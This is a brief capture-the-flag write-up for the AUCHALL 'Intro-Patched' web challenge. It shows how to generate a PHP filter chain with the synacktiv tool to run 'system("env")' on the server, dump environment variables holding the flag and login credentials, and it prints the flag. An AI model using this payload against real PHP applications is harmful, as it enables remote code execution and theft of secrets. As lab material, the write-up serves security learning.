AUCHALL - [Web] - Intro-Patched

You,AUCHALLWeb
Back

Challenge Description

The developer doesn't know about the issue, but they're pretty sure you can't get the flag

The flag is in an env and can be fetched using echo $FLAG You also need the USERNAME and PASSWORD variables for the intro-patched-privesc challenge.

Solution

Same like intro challenge but with some twists

Php Filter Chain

git clone https://github.com/synacktiv/php_filter_chain_generator.git
python3 php_filter_chain_generator.py --chain '<?php system("env"); ?>  '

On using the output of last command

Alt text

Flag

Flag is dynamic

CY243L{rc3_t0_only_g3t_th3_env_0r_n0_rc_bF7F2e0_XWSe_WNRV}

Writeups 2023 © RootxRAN.